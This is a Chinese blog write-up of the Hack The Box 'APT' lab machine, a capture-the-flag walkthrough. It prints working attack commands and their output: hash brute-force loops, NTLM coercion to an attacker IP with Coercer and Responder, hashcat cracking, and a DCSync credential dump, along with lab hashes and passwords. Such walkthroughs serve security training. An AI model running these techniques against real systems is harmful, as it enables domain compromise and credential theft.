-->

HTB-APT靶机

信息搜集

nmap

$ nmap --min-rate 10000 -p- -oA nmapscan/ports 10.129.96.60

Nmap scan report for gigantichosting.com (10.129.96.60)
Host is up (0.91s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc

$ nmap -sT -sC -sV -O -p80,135 -oA nmapscan/detail 10.129.96.60

Nmap scan report for 10.129.96.60
Host is up (0.21s latency).

PORT    STATE SERVICE VERSION
80/tcp  open  http    Microsoft IIS httpd 10.0
|_http-title: Gigantic Hosting | Home
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2016 (90%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (90%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

知道操作系统是Windows,80和135开放。

Web-80

这个网站里有很多静态内容。阅读源码发现一行注释:

<!-- Mirrored from 10.13.38.16/support.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 23 Dec 2019 08:13:45 GMT -->

可能来自某个网站的镜像。但是这对我们目前的进度没有任何帮助。

网站没有任何有意思的东西,目录爆破也没有发现敏感文件:

./feroxbuster -u http://10.129.96.60/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt                               
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.129.96.60/
 🚩  In-Scope Url          │ 10.129.96.60
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.0
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       29l       95w     1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        2l       10w      147c http://10.129.96.60/css => http://10.129.96.60/css/
301      GET        2l       10w      146c http://10.129.96.60/js => http://10.129.96.60/js/
301      GET        2l       10w      150c http://10.129.96.60/images => http://10.129.96.60/images/
200      GET       50l      118w     1268c http://10.129.96.60/js/nav.js
200      GET       21l       97w     7075c http://10.129.96.60/images/c-logo1.png
200      GET      147l      412w     5528c http://10.129.96.60/news.html
200      GET      357l      990w     8188c http://10.129.96.60/css/owl.carousel.css
200      GET       24l      156w    11339c http://10.129.96.60/images/c-logo4.png
200      GET      243l      870w    10592c http://10.129.96.60/services.html
200      GET       23l      133w    10584c http://10.129.96.60/images/c-logo.png
200      GET      347l     1094w    14879c http://10.129.96.60/index.html
200      GET       33l      144w    12681c http://10.129.96.60/images/c-logo5.png
200      GET       23l      123w     9804c http://10.129.96.60/images/c-logo3.png
200      GET      155l      468w     6326c http://10.129.96.60/support.html
200      GET      274l      958w    12146c http://10.129.96.60/clients.html
200      GET       21l      187w    12696c http://10.129.96.60/images/logo.png
200      GET      211l      718w     9386c http://10.129.96.60/about.html
200      GET       33l      161w    11330c http://10.129.96.60/images/c-logo6.png
200      GET        4l       48w    17807c http://10.129.96.60/fonts/css/font-awesome.min.css
200      GET     1470l     3315w    37908c http://10.129.96.60/js/owl.carousel.js
200      GET     1585l     3117w    28067c http://10.129.96.60/css/style.css
301      GET        2l       10w      150c http://10.129.96.60/Images => http://10.129.96.60/Images/
200      GET        4l     1421w    96381c http://10.129.96.60/js/jquery.min.js
200      GET     5785l    13825w   121276c http://10.129.96.60/css/bootstrap.css
200      GET      347l     1094w    14879c http://10.129.96.60/
301      GET        2l       10w      149c http://10.129.96.60/fonts => http://10.129.96.60/fonts/
403      GET       29l       92w     1233c http://10.129.96.60/fonts/
301      GET        2l       10w      153c http://10.129.96.60/fonts/css => http://10.129.96.60/fonts/css/
403      GET       29l       92w     1233c http://10.129.96.60/fonts/css/
301      GET        2l       10w      147c http://10.129.96.60/CSS => http://10.129.96.60/CSS/
403      GET       29l       92w     1233c http://10.129.96.60/fonts/fonts/
301      GET        2l       10w      155c http://10.129.96.60/fonts/fonts => http://10.129.96.60/fonts/fonts/
301      GET        2l       10w      153c http://10.129.96.60/fonts/CSS => http://10.129.96.60/fonts/CSS/
301      GET        2l       10w      146c http://10.129.96.60/JS => http://10.129.96.60/JS/
301      GET        2l       10w      146c http://10.129.96.60/Js => http://10.129.96.60/Js/
301      GET        2l       10w      147c http://10.129.96.60/Css => http://10.129.96.60/Css/
301      GET        2l       10w      153c http://10.129.96.60/fonts/Css => http://10.129.96.60/fonts/Css/
301      GET        2l       10w      150c http://10.129.96.60/IMAGES => http://10.129.96.60/IMAGES/
301      GET        2l       10w      149c http://10.129.96.60/Fonts => http://10.129.96.60/Fonts/
301      GET        2l       10w      153c http://10.129.96.60/Fonts/css => http://10.129.96.60/Fonts/css/
301      GET        2l       10w      155c http://10.129.96.60/fonts/Fonts => http://10.129.96.60/fonts/Fonts/
403      GET       29l       92w     1233c http://10.129.96.60/Fonts/Fonts/
301      GET        2l       10w      155c http://10.129.96.60/Fonts/fonts => http://10.129.96.60/Fonts/fonts/
301      GET        2l       10w      153c http://10.129.96.60/Fonts/CSS => http://10.129.96.60/Fonts/CSS/
301      GET        2l       10w      153c http://10.129.96.60/Fonts/Css => http://10.129.96.60/Fonts/Css/
301      GET        2l       10w      155c http://10.129.96.60/Fonts/Fonts => http://10.129.96.60/Fonts/Fonts/
400      GET        6l       26w      324c http://10.129.96.60/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/css/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/images/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/js/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/Images/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/fonts/css/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/fonts/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/fonts/fonts/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/CSS/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/JS/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/fonts/CSS/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/Css/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/Js/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/fonts/Css/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/IMAGES/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/Fonts/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/Fonts/css/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/fonts/Fonts/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/Fonts/fonts/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/Fonts/Fonts/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/Fonts/CSS/error%1F_log
400      GET        6l       26w      324c http://10.129.96.60/Fonts/Css/error%1F_log
[####################] - 4m    660085/660085  0s      found:68      errors:26     
[####################] - 4m     30000/30000   138/s   http://10.129.96.60/ 
[####################] - 4m     30000/30000   140/s   http://10.129.96.60/css/ 
[####################] - 4m     30000/30000   139/s   http://10.129.96.60/js/ 
[####################] - 4m     30000/30000   139/s   http://10.129.96.60/images/ 
[####################] - 4m     30000/30000   138/s   http://10.129.96.60/fonts/ 
[####################] - 4m     30000/30000   138/s   http://10.129.96.60/fonts/css/ 
[####################] - 4m     30000/30000   139/s   http://10.129.96.60/Images/ 
[####################] - 4m     30000/30000   140/s   http://10.129.96.60/fonts/fonts/ 
[####################] - 4m     30000/30000   140/s   http://10.129.96.60/CSS/ 
[####################] - 4m     30000/30000   141/s   http://10.129.96.60/fonts/CSS/ 
[####################] - 4m     30000/30000   142/s   http://10.129.96.60/JS/ 
[####################] - 4m     30000/30000   143/s   http://10.129.96.60/Js/ 
[####################] - 4m     30000/30000   143/s   http://10.129.96.60/Css/ 
[####################] - 4m     30000/30000   143/s   http://10.129.96.60/fonts/Css/ 
[####################] - 3m     30000/30000   144/s   http://10.129.96.60/IMAGES/ 
[####################] - 3m     30000/30000   146/s   http://10.129.96.60/Fonts/ 
[####################] - 3m     30000/30000   146/s   http://10.129.96.60/Fonts/css/ 
[####################] - 3m     30000/30000   146/s   http://10.129.96.60/fonts/Fonts/ 
[####################] - 3m     30000/30000   145/s   http://10.129.96.60/Fonts/Fonts/ 
[####################] - 3m     30000/30000   147/s   http://10.129.96.60/Fonts/fonts/ 
[####################] - 3m     30000/30000   147/s   http://10.129.96.60/Fonts/CSS/ 
[####################] - 3m     30000/30000   151/s   http://10.129.96.60/Fonts/Css/                   

现在视线应该转向135端口。

RPC-135

通过查询 RPC 定位器服务和各个端点,可以确定 TCP、UDP、HTTP 和 SMB 协议中 RPC 服务的暴露情况。诸如 rpcdump 之类的工具可以帮助识别由 IFID 值表示的唯一 RPC 服务,从而揭示服务详情和通信绑定:

rpcdump.py 10.129.96.60
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Retrieving endpoint list from 10.129.96.60
Protocol: [MS-RSP]: Remote Shutdown Protocol 
Provider: wininit.exe 
UUID    : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0 
Bindings: 
          ncacn_ip_tcp:10.129.96.60[49664]
          ncalrpc:[WindowsShutdown]
          ncacn_np:\\APT[\PIPE\InitShutdown]
          ncalrpc:[WMsgKRpc06EBC0]
............
............

[*] Received 266 endpoints.

使用 IOXIDResolver 识别目标的IP地址:

python3 IOXIDResolver.py -t 10.129.96.60
[*] Retrieving network interface of 10.129.96.60
Address: apt
Address: 10.129.96.60
Address: dead:beef::18d3:cd16:e553:73c4
Address: dead:beef::b885:d62a:d679:573f

IPV6 & nmap

将 IPV6 地址添加到 hosts 文件中,再使用nmap扫描一遍,发现更多开放端口。

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49673/tcp open  unknown
49685/tcp open  unknown
58200/tcp open  unknown

smb-445

可以匿名访问smb:

$ netexec smb -6 htb.local -u '' -p '' --shares

SMB         dead:beef::18d3:cd16:e553:73c4 445    APT              [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         dead:beef::18d3:cd16:e553:73c4 445    APT              [+] htb.local\: 
SMB         dead:beef::18d3:cd16:e553:73c4 445    APT              [*] Enumerated shares
SMB         dead:beef::18d3:cd16:e553:73c4 445    APT              Share           Permissions     Remark
SMB         dead:beef::18d3:cd16:e553:73c4 445    APT              -----           -----------     ------
SMB         dead:beef::18d3:cd16:e553:73c4 445    APT              backup          READ            
SMB         dead:beef::18d3:cd16:e553:73c4 445    APT              IPC$                            Remote IPC
SMB         dead:beef::18d3:cd16:e553:73c4 445    APT              NETLOGON                        Logon server share
SMB         dead:beef::18d3:cd16:e553:73c4 445    APT              SYSVOL                          Logon server share

值得注意的是 backup 文件夹,里面有一个backup.zip文件。

$ unzip -l backup.zip 

Archive:  backup.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        0  2020-09-23 19:40   Active Directory/
 50331648  2020-09-23 19:38   Active Directory/ntds.dit
    16384  2020-09-23 19:38   Active Directory/ntds.jfm
        0  2020-09-23 19:40   registry/
   262144  2020-09-23 19:22   registry/SECURITY
 12582912  2020-09-23 19:22   registry/SYSTEM
---------                     -------
 63193088                     6 files

通过工具爆破出压缩包密码iloveyousomuch,使用该密码将内容解压。

henry.vinson_adm

通过搜索发现压缩包内的文件可以离线导出用户哈希。

$ secretsdump.py -system registry/SYSTEM -ntds  Active\ Directory/ntds.dit LOCAL > backup_ad_dump
$ cat backup_ad_dump 
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x936ce5da88593206567f650411e1d16b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 1733ad403c773dde94dddffa2292ffe9
[*] Reading and decrypting hashes from Active Directory/ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb:::

............
............

尝试使用 psexc.py 以及 evil-winrm 获取 admin 哈希并登录,但是都无法登录。

有效用户爆破

用户数太多,足足两千个,我需要知道哪些用户是有效的。TCP88 开放,使用 Kerbrute 来检测有效用户。

提取出所有用户名:

$ cat userr.txt 
Administrator
Guest
krbtgt
DefaultAccount
jeb.sloan
ranson.mejia
unice.daugherty
............
............

kerbrute爆破:

$ ./kerbrute_linux_amd64 userenum -d htb.local --dc apt.htb ~/notes/HTB/APT/userr.txt
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 01/07/26 - Ronnie Flathers @ropnop

2026/01/07 01:42:48 >  Using KDC(s):
2026/01/07 01:42:48 >  	apt.htb:88

2026/01/07 01:42:55 >  [+] VALID USERNAME:	 Administrator@htb.local
2026/01/07 01:47:28 >  [+] VALID USERNAME:	 henry.vinson@htb.local
2026/01/07 02:03:10 >  [+] VALID USERNAME:	 APT$@htb.local
2026/01/07 02:03:10 >  Done! Tested 2000 usernames (3 valid) in 1221.316 seconds

APT的域中只有三个账户是有效的。分别是 admin、APT$、henry.vinson。鉴于当前环境上下文,优先以 henry.vinson 用户以及此用户对应的哈希进行身份验证。

$ netexec smb -6 htb.local -u henry.vinson -H 2de80758521541d19cabba480b260e8f

SMB         dead:beef::18d3:cd16:e553:73c4 445    APT              [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         dead:beef::18d3:cd16:e553:73c4 445    APT              [-] htb.local\henry.vinson:2de80758521541d19cabba480b260e8f STATUS_LOGON_FAILURE

不幸的是,哈希值无效。

哈希重用

考虑是否有其他哈希可以作用于 henry.vinson,netexec 爆破到达一定次数之后完全停止响应。猜测可能有防御机制把请求隔离了。尝试其他工具,如 getTGT.py、pyKerbrute。

getTGT.py 是只要用户名和哈希正确,就能申请 TGT,并在当前目录生成一个凭据。

#!/bin/bash

while IFS='' read -r LIME || [ -n "${LIME}"]
do
    echo "Feed the Hash"
    getTGT.py htb.local/henry.vinson@htb.local -hashes :${LIME}

done < hashh.txt

监控有没有产生文件:

watch "ls -lrt | tail -2"

pyKerbrute 接收一个用户列表和一个哈希值,并对所有用户进行 Kerberos 身份验证。可以对其进行简单修改,通过单一用户和多个哈希进行爆破。

最后获得一组匹配的哈希: henry.vinson:e53d87d42adaa3ca32bdb34a876cbffb

reg.py

再次尝试使用 psexc.py 以及 evil-winrm 进行身份验证。可惜的是 henry.vinson 没有 WinRM 权限,也不是管理员(因此无法使用 psexec )。

但是仍然可以做一些事情。比如提取注册表内容:

$ reg.py -hashes ':e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\

HKU这个主键下存的都是用户相关的信息。在 HKU 里发现了一组凭据。

UserName	REG_SZ	 henry.vinson_adm
PassWord	REG_SZ	 G1#Ny5@2dvht

由此可以通过 WinRM 远程登录并在 C:\Users\henry.vinson_adm\desktop 拿到 user.txt。

administartor

当前机器只有两个活动用户:henry.vinson、henry.vinson_adm。一个管理员用户。

找到一个 powershell 历史记录文件:

$ ls C:\Users\henry.vinson_adm\AppData\Roaming\microsoft\windows\powershell\PSREadline

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       11/10/2020  10:58 AM            458 ConsoleHost_history.txt

里面的内容很感兴趣:

$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}

这更像是靶机故意给我们的提示。lmcompatibilitylevel 是 Windows 的身份验证安全策略,控制系统允许使用哪些 NTLM/LM 认证方式。现在这个值为2,告诉我们机器使用 NTLMv1 进行身份验证,而 NTLMv1 又非常不安全。

在 APT 上确认是否已这样设置:

*Evil-WinRM* PS C:\> Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel

lmcompatibilitylevel : 2
PSPath               : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
PSParentPath         : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
PSChildName          : Lsa
PSDrive              : HKLM
PSProvider           : Microsoft.PowerShell.Core\Registry

Responder

使用Coercer和 Responder获取 Net-NTLMv1 。找到Responder.conf ,将挑战码设置为 1122334455667788

根据文档,使用 --lm 参数强制降级:

$ sudo responder -I tun0 --lm
$ sudo coercer coerce -l 10.10.11.200 -t dead:beef::18d3:cd16:e553:73c4 -u administrator -p G1#Ny5@2dvht -d local.htb

收到challenge:

[SMB] NTLMv1 Client   : 10.129.4.8
[SMB] NTLMv1 Username : HTB\APT$
[SMB] NTLMv1 Hash     : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788

现在把它提交到 crack.sh 当中,或者使用 hashcat 进行破解:

hashcat -m 14000 -a 3 -1 DES_full.charset --hex-charset hashcat.txt ?1?1?1?1?1?1?1?1

最后的哈希为:d167c3238864b12f5f82feae86a7f798

Dump

这组哈希无法 evil 登录。但是可以执行 dnsync 攻击。

$ secretsdump.py local.htb/apt\$@local.htb -target-ip dead:beef::18d3:cd16:e553:73c4-hashes :d167c3238864b12f5f82feae86a7f798

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:738f00ed06dc528fd7ebb7a010e50849:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef:::
APT$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3
Administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413
Administrator:des-cbc-md5:0816d9d052239b8a
krbtgt:aes256-cts-hmac-sha1-96:b63635342a6d3dce76fcbca203f92da46be6cdd99c67eb233d0aaaaaa40914bb
krbtgt:aes128-cts-hmac-sha1-96:7735d98abc187848119416e08936799b
krbtgt:des-cbc-md5:f8c26238c2d976bf
henry.vinson:aes256-cts-hmac-sha1-96:63b23a7fd3df2f0add1e62ef85ea4c6c8dc79bb8d6a430ab3a1ef6994d1a99e2
henry.vinson:aes128-cts-hmac-sha1-96:0a55e9f5b1f7f28aef9b7792124af9af
henry.vinson:des-cbc-md5:73b6f71cae264fad
henry.vinson_adm:aes256-cts-hmac-sha1-96:f2299c6484e5af8e8c81777eaece865d54a499a2446ba2792c1089407425c3f4
henry.vinson_adm:aes128-cts-hmac-sha1-96:3d70c66c8a8635bdf70edf2f6062165b
henry.vinson_adm:des-cbc-md5:5df8682c8c07a179
APT$:aes256-cts-hmac-sha1-96:4c318c89595e1e3f2c608f3df56a091ecedc220be7b263f7269c412325930454
APT$:aes128-cts-hmac-sha1-96:bf1c1795c63ab278384f2ee1169872d9
APT$:des-cbc-md5:76c45245f104a4bf
[*] Cleaning up... 

获得了AD 中其余帐户的哈希值。administrator 的哈希成功登录。

C:\Users\Administrator\desktop 中获得 root.txt

posted @ 2026-01-07 16:06  Merakii  阅读(3)  评论(0)    收藏  举报